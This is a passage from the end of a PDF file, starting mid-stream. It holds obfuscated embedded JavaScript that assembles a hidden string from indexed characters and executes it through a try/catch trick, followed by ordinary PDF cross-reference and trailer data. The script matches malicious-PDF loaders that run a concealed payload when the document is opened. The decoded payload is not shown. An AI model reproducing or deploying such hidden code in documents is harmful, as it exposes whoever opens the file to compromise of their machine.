h"]\($[50]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[59]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[55]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[15]\);s["p"+"u"+"sh"]\($[5]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[59]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[55]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[9]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[72]\);s["p"+"u"+"sh"]\($[72]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[74]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[12]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[59]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[55]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[43]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[48]\);}try{this.info.ebwg.erbgera.bgser=123}catch\(wqtr23v23\){e\(s['join']\(""\)\);})>>
endobj
xref
0 155
trailer
<</Size 155
/Root 21 0 R>>
xref
0 0
trailer
<</Size 155/Prev 75626/XRefStm 416/Root 21 0 R>>
startxref
78995
%%EOF